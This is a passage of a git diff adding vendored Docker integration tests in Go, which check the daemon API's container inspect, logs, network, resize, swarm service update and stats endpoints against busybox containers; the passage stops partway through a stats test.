--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go
@@ -0,0 +1,183 @@
+package main
+
+import (
+	"encoding/json"
+	"net/http"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/versions/v1p20"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/stringutils"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestInspectAPIContainerResponse(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "true")
+
+	cleanedContainerID := strings.TrimSpace(out)
+	keysBase := []string{"Id", "State", "Created", "Path", "Args", "Config", "Image", "NetworkSettings",
+		"ResolvConfPath", "HostnamePath", "HostsPath", "LogPath", "Name", "Driver", "MountLabel", "ProcessLabel", "GraphDriver"}
+
+	type acase struct {
+		version string
+		keys    []string
+	}
+
+	var cases []acase
+
+	if daemonPlatform == "windows" {
+		cases = []acase{
+			{"v1.25", append(keysBase, "Mounts")},
+		}
+
+	} else {
+		cases = []acase{
+			{"v1.20", append(keysBase, "Mounts")},
+			{"v1.19", append(keysBase, "Volumes", "VolumesRW")},
+		}
+	}
+
+	for _, cs := range cases {
+		body := getInspectBody(c, cs.version, cleanedContainerID)
+
+		var inspectJSON map[string]interface{}
+		err := json.Unmarshal(body, &inspectJSON)
+		c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for version %s", cs.version))
+
+		for _, key := range cs.keys {
+			_, ok := inspectJSON[key]
+			c.Check(ok, checker.True, check.Commentf("%s does not exist in response for version %s", key, cs.version))
+		}
+
+		//Issue #6830: type not properly converted to JSON/back
+		_, ok := inspectJSON["Path"].(bool)
+		c.Assert(ok, checker.False, check.Commentf("Path of `true` should not be converted to boolean `true` via JSON marshalling"))
+	}
+}
+
+func (s *DockerSuite) TestInspectAPIContainerVolumeDriverLegacy(c *check.C) {
+	// No legacy implications for Windows
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "true")
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	cases := []string{"v1.19", "v1.20"}
+	for _, version := range cases {
+		body := getInspectBody(c, version, cleanedContainerID)
+
+		var inspectJSON map[string]interface{}
+		err := json.Unmarshal(body, &inspectJSON)
+		c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for version %s", version))
+
+		config, ok := inspectJSON["Config"]
+		c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'"))
+		cfg := config.(map[string]interface{})
+		_, ok = cfg["VolumeDriver"]
+		c.Assert(ok, checker.True, check.Commentf("API version %s expected to include VolumeDriver in 'Config'", version))
+	}
+}
+
+func (s *DockerSuite) TestInspectAPIContainerVolumeDriver(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "--volume-driver", "local", "busybox", "true")
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	body := getInspectBody(c, "v1.25", cleanedContainerID)
+
+	var inspectJSON map[string]interface{}
+	err := json.Unmarshal(body, &inspectJSON)
+	c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for version 1.25"))
+
+	config, ok := inspectJSON["Config"]
+	c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'"))
+	cfg := config.(map[string]interface{})
+	_, ok = cfg["VolumeDriver"]
+	c.Assert(ok, checker.False, check.Commentf("API version 1.25 expected to not include VolumeDriver in 'Config'"))
+
+	config, ok = inspectJSON["HostConfig"]
+	c.Assert(ok, checker.True, check.Commentf("Unable to find 'HostConfig'"))
+	cfg = config.(map[string]interface{})
+	_, ok = cfg["VolumeDriver"]
+	c.Assert(ok, checker.True, check.Commentf("API version 1.25 expected to include VolumeDriver in 'HostConfig'"))
+}
+
+func (s *DockerSuite) TestInspectAPIImageResponse(c *check.C) {
+	dockerCmd(c, "tag", "busybox:latest", "busybox:mytag")
+
+	endpoint := "/images/busybox/json"
+	status, body, err := sockRequest("GET", endpoint, nil)
+
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+
+	var imageJSON types.ImageInspect
+	err = json.Unmarshal(body, &imageJSON)
+	c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for latest version"))
+	c.Assert(imageJSON.RepoTags, checker.HasLen, 2)
+
+	c.Assert(stringutils.InSlice(imageJSON.RepoTags, "busybox:latest"), checker.Equals, true)
+	c.Assert(stringutils.InSlice(imageJSON.RepoTags, "busybox:mytag"), checker.Equals, true)
+}
+
+// #17131, #17139, #17173
+func (s *DockerSuite) TestInspectAPIEmptyFieldsInConfigPre121(c *check.C) {
+	// Not relevant on Windows
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "true")
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	cases := []string{"v1.19", "v1.20"}
+	for _, version := range cases {
+		body := getInspectBody(c, version, cleanedContainerID)
+
+		var inspectJSON map[string]interface{}
+		err := json.Unmarshal(body, &inspectJSON)
+		c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for version %s", version))
+		config, ok := inspectJSON["Config"]
+		c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'"))
+		cfg := config.(map[string]interface{})
+		for _, f := range []string{"MacAddress", "NetworkDisabled", "ExposedPorts"} {
+			_, ok := cfg[f]
+			c.Check(ok, checker.True, check.Commentf("API version %s expected to include %s in 'Config'", version, f))
+		}
+	}
+}
+
+func (s *DockerSuite) TestInspectAPIBridgeNetworkSettings120(c *check.C) {
+	// Not relevant on Windows, and besides it doesn't have any bridge network settings
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
+	containerID := strings.TrimSpace(out)
+	waitRun(containerID)
+
+	body := getInspectBody(c, "v1.20", containerID)
+
+	var inspectJSON v1p20.ContainerJSON
+	err := json.Unmarshal(body, &inspectJSON)
+	c.Assert(err, checker.IsNil)
+
+	settings := inspectJSON.NetworkSettings
+	c.Assert(settings.IPAddress, checker.Not(checker.HasLen), 0)
+}
+
+func (s *DockerSuite) TestInspectAPIBridgeNetworkSettings121(c *check.C) {
+	// Windows doesn't have any bridge network settings
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
+	containerID := strings.TrimSpace(out)
+	waitRun(containerID)
+
+	body := getInspectBody(c, "v1.21", containerID)
+
+	var inspectJSON types.ContainerJSON
+	err := json.Unmarshal(body, &inspectJSON)
+	c.Assert(err, checker.IsNil)
+
+	settings := inspectJSON.NetworkSettings
+	c.Assert(settings.IPAddress, checker.Not(checker.HasLen), 0)
+	c.Assert(settings.Networks["bridge"], checker.Not(checker.IsNil))
+	c.Assert(settings.IPAddress, checker.Equals, settings.Networks["bridge"].IPAddress)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go
new file mode 100644
index 0000000000..f49a139c28
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go
@@ -0,0 +1,35 @@
+// +build !windows
+
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// #16665
+func (s *DockerSuite) TestInspectAPICpusetInConfigPre120(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, cgroupCpuset)
+
+	name := "cpusetinconfig-pre120"
+	dockerCmd(c, "run", "--name", name, "--cpuset-cpus", "0", "busybox", "true")
+
+	status, body, err := sockRequest("GET", fmt.Sprintf("/v1.19/containers/%s/json", name), nil)
+	c.Assert(status, check.Equals, http.StatusOK)
+	c.Assert(err, check.IsNil)
+
+	var inspectJSON map[string]interface{}
+	err = json.Unmarshal(body, &inspectJSON)
+	c.Assert(err, checker.IsNil, check.Commentf("unable to unmarshal body for version 1.19"))
+
+	config, ok := inspectJSON["Config"]
+	c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'"))
+	cfg := config.(map[string]interface{})
+	_, ok = cfg["Cpuset"]
+	c.Assert(ok, checker.True, check.Commentf("API version 1.19 expected to include Cpuset in 'Config'"))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go
new file mode 100644
index 0000000000..2e8ffa9bdc
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go
@@ -0,0 +1,87 @@
+package main
+
+import (
+	"bufio"
+	"bytes"
+	"fmt"
+	"net/http"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestLogsAPIWithStdout(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "-t", "busybox", "/bin/sh", "-c", "while true; do echo hello; sleep 1; done")
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+
+	type logOut struct {
+		out string
+		res *http.Response
+		err error
+	}
+	chLog := make(chan logOut)
+
+	go func() {
+		res, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&timestamps=1", id), nil, "")
+		if err != nil {
+			chLog <- logOut{"", nil, err}
+			return
+		}
+		defer body.Close()
+		out, err := bufio.NewReader(body).ReadString('\n')
+		if err != nil {
+			chLog <- logOut{"", nil, err}
+			return
+		}
+		chLog <- logOut{strings.TrimSpace(out), res, err}
+	}()
+
+	select {
+	case l := <-chLog:
+		c.Assert(l.err, checker.IsNil)
+		c.Assert(l.res.StatusCode, checker.Equals, http.StatusOK)
+		if !strings.HasSuffix(l.out, "hello") {
+			c.Fatalf("expected log output to container 'hello', but it does not")
+		}
+	case <-time.After(20 * time.Second):
+		c.Fatal("timeout waiting for logs to exit")
+	}
+}
+
+func (s *DockerSuite) TestLogsAPINoStdoutNorStderr(c *check.C) {
+	name := "logs_test"
+	dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh")
+
+	status, body, err := sockRequest("GET", fmt.Sprintf("/containers/%s/logs", name), nil)
+	c.Assert(status, checker.Equals, http.StatusBadRequest)
+	c.Assert(err, checker.IsNil)
+
+	expected := "Bad parameters: you must choose at least one stream"
+	c.Assert(getErrorMessage(c, body), checker.Contains, expected)
+}
+
+// Regression test for #12704
+func (s *DockerSuite) TestLogsAPIFollowEmptyOutput(c *check.C) {
+	name := "logs_test"
+	t0 := time.Now()
+	dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "sleep", "10")
+
+	_, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name), bytes.NewBuffer(nil), "")
+	t1 := time.Now()
+	c.Assert(err, checker.IsNil)
+	body.Close()
+	elapsed := t1.Sub(t0).Seconds()
+	if elapsed > 20.0 {
+		c.Fatalf("HTTP response was not immediate (elapsed %.1fs)", elapsed)
+	}
+}
+
+func (s *DockerSuite) TestLogsAPIContainerNotFound(c *check.C) {
+	name := "nonExistentContainer"
+	resp, _, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name), bytes.NewBuffer(nil), "")
+	c.Assert(err, checker.IsNil)
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusNotFound)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go
new file mode 100644
index 0000000000..1cc66f0900
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go
@@ -0,0 +1,353 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"net"
+	"net/http"
+	"net/url"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestAPINetworkGetDefaults(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	// By default docker daemon creates 3 networks. check if they are present
+	defaults := []string{"bridge", "host", "none"}
+	for _, nn := range defaults {
+		c.Assert(isNetworkAvailable(c, nn), checker.Equals, true)
+	}
+}
+
+func (s *DockerSuite) TestAPINetworkCreateDelete(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	// Create a network
+	name := "testnetwork"
+	config := types.NetworkCreateRequest{
+		Name: name,
+		NetworkCreate: types.NetworkCreate{
+			CheckDuplicate: true,
+		},
+	}
+	id := createNetwork(c, config, true)
+	c.Assert(isNetworkAvailable(c, name), checker.Equals, true)
+
+	// delete the network and make sure it is deleted
+	deleteNetwork(c, id, true)
+	c.Assert(isNetworkAvailable(c, name), checker.Equals, false)
+}
+
+func (s *DockerSuite) TestAPINetworkCreateCheckDuplicate(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "testcheckduplicate"
+	configOnCheck := types.NetworkCreateRequest{
+		Name: name,
+		NetworkCreate: types.NetworkCreate{
+			CheckDuplicate: true,
+		},
+	}
+	configNotCheck := types.NetworkCreateRequest{
+		Name: name,
+		NetworkCreate: types.NetworkCreate{
+			CheckDuplicate: false,
+		},
+	}
+
+	// Creating a new network first
+	createNetwork(c, configOnCheck, true)
+	c.Assert(isNetworkAvailable(c, name), checker.Equals, true)
+
+	// Creating another network with same name and CheckDuplicate must fail
+	createNetwork(c, configOnCheck, false)
+
+	// Creating another network with same name and not CheckDuplicate must succeed
+	createNetwork(c, configNotCheck, true)
+}
+
+func (s *DockerSuite) TestAPINetworkFilter(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	nr := getNetworkResource(c, getNetworkIDByName(c, "bridge"))
+	c.Assert(nr.Name, checker.Equals, "bridge")
+}
+
+func (s *DockerSuite) TestAPINetworkInspect(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	// Inspect default bridge network
+	nr := getNetworkResource(c, "bridge")
+	c.Assert(nr.Name, checker.Equals, "bridge")
+
+	// run a container and attach it to the default bridge network
+	out, _ := dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top")
+	containerID := strings.TrimSpace(out)
+	containerIP := findContainerIP(c, "test", "bridge")
+
+	// inspect default bridge network again and make sure the container is connected
+	nr = getNetworkResource(c, nr.ID)
+	c.Assert(nr.Driver, checker.Equals, "bridge")
+	c.Assert(nr.Scope, checker.Equals, "local")
+	c.Assert(nr.Internal, checker.Equals, false)
+	c.Assert(nr.EnableIPv6, checker.Equals, false)
+	c.Assert(nr.IPAM.Driver, checker.Equals, "default")
+	c.Assert(len(nr.Containers), checker.Equals, 1)
+	c.Assert(nr.Containers[containerID], checker.NotNil)
+
+	ip, _, err := net.ParseCIDR(nr.Containers[containerID].IPv4Address)
+	c.Assert(err, checker.IsNil)
+	c.Assert(ip.String(), checker.Equals, containerIP)
+
+	// IPAM configuration inspect
+	ipam := &network.IPAM{
+		Driver: "default",
+		Config: []network.IPAMConfig{{Subnet: "172.28.0.0/16", IPRange: "172.28.5.0/24", Gateway: "172.28.5.254"}},
+	}
+	config := types.NetworkCreateRequest{
+		Name: "br0",
+		NetworkCreate: types.NetworkCreate{
+			Driver:  "bridge",
+			IPAM:    ipam,
+			Options: map[string]string{"foo": "bar", "opts": "dopts"},
+		},
+	}
+	id0 := createNetwork(c, config, true)
+	c.Assert(isNetworkAvailable(c, "br0"), checker.Equals, true)
+
+	nr = getNetworkResource(c, id0)
+	c.Assert(len(nr.IPAM.Config), checker.Equals, 1)
+	c.Assert(nr.IPAM.Config[0].Subnet, checker.Equals, "172.28.0.0/16")
+	c.Assert(nr.IPAM.Config[0].IPRange, checker.Equals, "172.28.5.0/24")
+	c.Assert(nr.IPAM.Config[0].Gateway, checker.Equals, "172.28.5.254")
+	c.Assert(nr.Options["foo"], checker.Equals, "bar")
+	c.Assert(nr.Options["opts"], checker.Equals, "dopts")
+
+	// delete the network and make sure it is deleted
+	deleteNetwork(c, id0, true)
+	c.Assert(isNetworkAvailable(c, "br0"), checker.Equals, false)
+}
+
+func (s *DockerSuite) TestAPINetworkConnectDisconnect(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	// Create test network
+	name := "testnetwork"
+	config := types.NetworkCreateRequest{
+		Name: name,
+	}
+	id := createNetwork(c, config, true)
+	nr := getNetworkResource(c, id)
+	c.Assert(nr.Name, checker.Equals, name)
+	c.Assert(nr.ID, checker.Equals, id)
+	c.Assert(len(nr.Containers), checker.Equals, 0)
+
+	// run a container
+	out, _ := dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top")
+	containerID := strings.TrimSpace(out)
+
+	// connect the container to the test network
+	connectNetwork(c, nr.ID, containerID)
+
+	// inspect the network to make sure container is connected
+	nr = getNetworkResource(c, nr.ID)
+	c.Assert(len(nr.Containers), checker.Equals, 1)
+	c.Assert(nr.Containers[containerID], checker.NotNil)
+
+	// check if container IP matches network inspect
+	ip, _, err := net.ParseCIDR(nr.Containers[containerID].IPv4Address)
+	c.Assert(err, checker.IsNil)
+	containerIP := findContainerIP(c, "test", "testnetwork")
+	c.Assert(ip.String(), checker.Equals, containerIP)
+
+	// disconnect container from the network
+	disconnectNetwork(c, nr.ID, containerID)
+	nr = getNetworkResource(c, nr.ID)
+	c.Assert(nr.Name, checker.Equals, name)
+	c.Assert(len(nr.Containers), checker.Equals, 0)
+
+	// delete the network
+	deleteNetwork(c, nr.ID, true)
+}
+
+func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	// test0 bridge network
+	ipam0 := &network.IPAM{
+		Driver: "default",
+		Config: []network.IPAMConfig{{Subnet: "192.178.0.0/16", IPRange: "192.178.128.0/17", Gateway: "192.178.138.100"}},
+	}
+	config0 := types.NetworkCreateRequest{
+		Name: "test0",
+		NetworkCreate: types.NetworkCreate{
+			Driver: "bridge",
+			IPAM:   ipam0,
+		},
+	}
+	id0 := createNetwork(c, config0, true)
+	c.Assert(isNetworkAvailable(c, "test0"), checker.Equals, true)
+
+	ipam1 := &network.IPAM{
+		Driver: "default",
+		Config: []network.IPAMConfig{{Subnet: "192.178.128.0/17", Gateway: "192.178.128.1"}},
+	}
+	// test1 bridge network overlaps with test0
+	config1 := types.NetworkCreateRequest{
+		Name: "test1",
+		NetworkCreate: types.NetworkCreate{
+			Driver: "bridge",
+			IPAM:   ipam1,
+		},
+	}
+	createNetwork(c, config1, false)
+	c.Assert(isNetworkAvailable(c, "test1"), checker.Equals, false)
+
+	ipam2 := &network.IPAM{
+		Driver: "default",
+		Config: []network.IPAMConfig{{Subnet: "192.169.0.0/16", Gateway: "192.169.100.100"}},
+	}
+	// test2 bridge network does not overlap
+	config2 := types.NetworkCreateRequest{
+		Name: "test2",
+		NetworkCreate: types.NetworkCreate{
+			Driver: "bridge",
+			IPAM:   ipam2,
+		},
+	}
+	createNetwork(c, config2, true)
+	c.Assert(isNetworkAvailable(c, "test2"), checker.Equals, true)
+
+	// remove test0 and retry to create test1
+	deleteNetwork(c, id0, true)
+	createNetwork(c, config1, true)
+	c.Assert(isNetworkAvailable(c, "test1"), checker.Equals, true)
+
+	// for networks w/o ipam specified, docker will choose proper non-overlapping subnets
+	createNetwork(c, types.NetworkCreateRequest{Name: "test3"}, true)
+	c.Assert(isNetworkAvailable(c, "test3"), checker.Equals, true)
+	createNetwork(c, types.NetworkCreateRequest{Name: "test4"}, true)
+	c.Assert(isNetworkAvailable(c, "test4"), checker.Equals, true)
+	createNetwork(c, types.NetworkCreateRequest{Name: "test5"}, true)
+	c.Assert(isNetworkAvailable(c, "test5"), checker.Equals, true)
+
+	for i := 1; i < 6; i++ {
+		deleteNetwork(c, fmt.Sprintf("test%d", i), true)
+	}
+}
+
+func (s *DockerSuite) TestAPICreateDeletePredefinedNetworks(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	createDeletePredefinedNetwork(c, "bridge")
+	createDeletePredefinedNetwork(c, "none")
+	createDeletePredefinedNetwork(c, "host")
+}
+
+func createDeletePredefinedNetwork(c *check.C, name string) {
+	// Create pre-defined network
+	config := types.NetworkCreateRequest{
+		Name: name,
+		NetworkCreate: types.NetworkCreate{
+			CheckDuplicate: true,
+		},
+	}
+	shouldSucceed := false
+	createNetwork(c, config, shouldSucceed)
+	deleteNetwork(c, name, shouldSucceed)
+}
+
+func isNetworkAvailable(c *check.C, name string) bool {
+	status, body, err := sockRequest("GET", "/networks", nil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(err, checker.IsNil)
+
+	nJSON := []types.NetworkResource{}
+	err = json.Unmarshal(body, &nJSON)
+	c.Assert(err, checker.IsNil)
+
+	for _, n := range nJSON {
+		if n.Name == name {
+			return true
+		}
+	}
+	return false
+}
+
+func getNetworkIDByName(c *check.C, name string) string {
+	var (
+		v          = url.Values{}
+		filterArgs = filters.NewArgs()
+	)
+	filterArgs.Add("name", name)
+	filterJSON, err := filters.ToParam(filterArgs)
+	c.Assert(err, checker.IsNil)
+	v.Set("filters", filterJSON)
+
+	status, body, err := sockRequest("GET", "/networks?"+v.Encode(), nil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(err, checker.IsNil)
+
+	nJSON := []types.NetworkResource{}
+	err = json.Unmarshal(body, &nJSON)
+	c.Assert(err, checker.IsNil)
+	c.Assert(len(nJSON), checker.Equals, 1)
+
+	return nJSON[0].ID
+}
+
+func getNetworkResource(c *check.C, id string) *types.NetworkResource {
+	_, obj, err := sockRequest("GET", "/networks/"+id, nil)
+	c.Assert(err, checker.IsNil)
+
+	nr := types.NetworkResource{}
+	err = json.Unmarshal(obj, &nr)
+	c.Assert(err, checker.IsNil)
+
+	return &nr
+}
+
+func createNetwork(c *check.C, config types.NetworkCreateRequest, shouldSucceed bool) string {
+	status, resp, err := sockRequest("POST", "/networks/create", config)
+	if !shouldSucceed {
+		c.Assert(status, checker.Not(checker.Equals), http.StatusCreated)
+		return ""
+	}
+
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+
+	var nr types.NetworkCreateResponse
+	err = json.Unmarshal(resp, &nr)
+	c.Assert(err, checker.IsNil)
+
+	return nr.ID
+}
+
+func connectNetwork(c *check.C, nid, cid string) {
+	config := types.NetworkConnect{
+		Container: cid,
+	}
+
+	status, _, err := sockRequest("POST", "/networks/"+nid+"/connect", config)
+	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(err, checker.IsNil)
+}
+
+func disconnectNetwork(c *check.C, nid, cid string) {
+	config := types.NetworkConnect{
+		Container: cid,
+	}
+
+	status, _, err := sockRequest("POST", "/networks/"+nid+"/disconnect", config)
+	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(err, checker.IsNil)
+}
+
+func deleteNetwork(c *check.C, id string, shouldSucceed bool) {
+	status, _, err := sockRequest("DELETE", "/networks/"+id, nil)
+	if !shouldSucceed {
+		c.Assert(status, checker.Not(checker.Equals), http.StatusOK)
+		return
+	}
+	c.Assert(status, checker.Equals, http.StatusNoContent)
+	c.Assert(err, checker.IsNil)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go
new file mode 100644
index 0000000000..daf1b05d2e
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go
@@ -0,0 +1,44 @@
+package main
+
+import (
+	"net/http"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestResizeAPIResponse(c *check.C) {
+	out, _ := runSleepingContainer(c, "-d")
+	cleanedContainerID := strings.TrimSpace(out)
+
+	endpoint := "/containers/" + cleanedContainerID + "/resize?h=40&w=40"
+	status, _, err := sockRequest("POST", endpoint, nil)
+	c.Assert(status, check.Equals, http.StatusOK)
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestResizeAPIHeightWidthNoInt(c *check.C) {
+	out, _ := runSleepingContainer(c, "-d")
+	cleanedContainerID := strings.TrimSpace(out)
+
+	endpoint := "/containers/" + cleanedContainerID + "/resize?h=foo&w=bar"
+	status, _, err := sockRequest("POST", endpoint, nil)
+	c.Assert(status, check.Equals, http.StatusInternalServerError)
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestResizeAPIResponseWhenContainerNotStarted(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "true")
+	cleanedContainerID := strings.TrimSpace(out)
+
+	// make sure the exited container is not running
+	dockerCmd(c, "wait", cleanedContainerID)
+
+	endpoint := "/containers/" + cleanedContainerID + "/resize?h=40&w=40"
+	status, body, err := sockRequest("POST", endpoint, nil)
+	c.Assert(status, check.Equals, http.StatusInternalServerError)
+	c.Assert(err, check.IsNil)
+
+	c.Assert(getErrorMessage(c, body), checker.Contains, "is not running", check.Commentf("resize should fail with message 'Container is not running'"))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go
new file mode 100644
index 0000000000..15a21e579f
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go
@@ -0,0 +1,39 @@
+// +build !windows
+
+package main
+
+import (
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func setPortConfig(portConfig []swarm.PortConfig) serviceConstructor {
+	return func(s *swarm.Service) {
+		if s.Spec.EndpointSpec == nil {
+			s.Spec.EndpointSpec = &swarm.EndpointSpec{}
+		}
+		s.Spec.EndpointSpec.Ports = portConfig
+	}
+}
+
+func (s *DockerSwarmSuite) TestAPIServiceUpdatePort(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// Create a service with a port mapping of 8080:8081.
+	portConfig := []swarm.PortConfig{{TargetPort: 8081, PublishedPort: 8080}}
+	serviceID := d.createService(c, simpleTestService, setInstances(1), setPortConfig(portConfig))
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+
+	// Update the service: changed the port mapping from 8080:8081 to 8082:8083.
+	updatedPortConfig := []swarm.PortConfig{{TargetPort: 8083, PublishedPort: 8082}}
+	remoteService := d.getService(c, serviceID)
+	d.updateService(c, remoteService, setPortConfig(updatedPortConfig))
+
+	// Inspect the service and verify port mapping.
+	updatedService := d.getService(c, serviceID)
+	c.Assert(updatedService.Spec.EndpointSpec, check.NotNil)
+	c.Assert(len(updatedService.Spec.EndpointSpec.Ports), check.Equals, 1)
+	c.Assert(updatedService.Spec.EndpointSpec.Ports[0].TargetPort, check.Equals, uint32(8083))
+	c.Assert(updatedService.Spec.EndpointSpec.Ports[0].PublishedPort, check.Equals, uint32(8082))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go
new file mode 100644
index 0000000000..23fbdbb740
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go
@@ -0,0 +1,310 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"os/exec"
+	"runtime"
+	"strconv"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+var expectedNetworkInterfaceStats = strings.Split("rx_bytes rx_dropped rx_errors rx_packets tx_bytes tx_dropped tx_errors tx_packets", " ")
+
+func (s *DockerSuite) TestAPIStatsNoStreamGetCpu(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true;do echo 'Hello'; usleep 100000; done")
+
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+
+	resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "")
+	c.Assert(err, checker.IsNil)
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK)
+	c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json")
+
+	var v *types.Stats
+	err = json.NewDecoder(body).Decode(&v)
+	c.Assert(err, checker.IsNil)
+	body.Close()
+
+	var cpuPercent = 0.0
+
+	if daemonPlatform != "windows" {
+		cpuDelta := float64(v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage)
+		systemDelta := float64(v.CPUStats.SystemUsage - v.PreCPUStats.SystemUsage)
+		cpuPercent = (cpuDelta / systemDelta) * float64(len(v.CPUStats.CPUUsage.PercpuUsage)) * 100.0
+	} else {
+		// Max number of 100ns intervals between the previous time read and now
+		possIntervals := uint64(v.Read.Sub(v.PreRead).Nanoseconds()) // Start with number of ns intervals
+		possIntervals /= 100                                         // Convert to number of 100ns intervals
+		possIntervals *= uint64(v.NumProcs)                          // Multiple by the number of processors
+
+		// Intervals used
+		intervalsUsed := v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage
+
+		// Percentage avoiding divide-by-zero
+		if possIntervals > 0 {
+			cpuPercent = float64(intervalsUsed) / float64(possIntervals) * 100.0
+		}
+	}
+
+	c.Assert(cpuPercent, check.Not(checker.Equals), 0.0, check.Commentf("docker stats with no-stream get cpu usage failed: was %v", cpuPercent))
+}
+
+func (s *DockerSuite) TestAPIStatsStoppedContainerInGoroutines(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "echo 1")
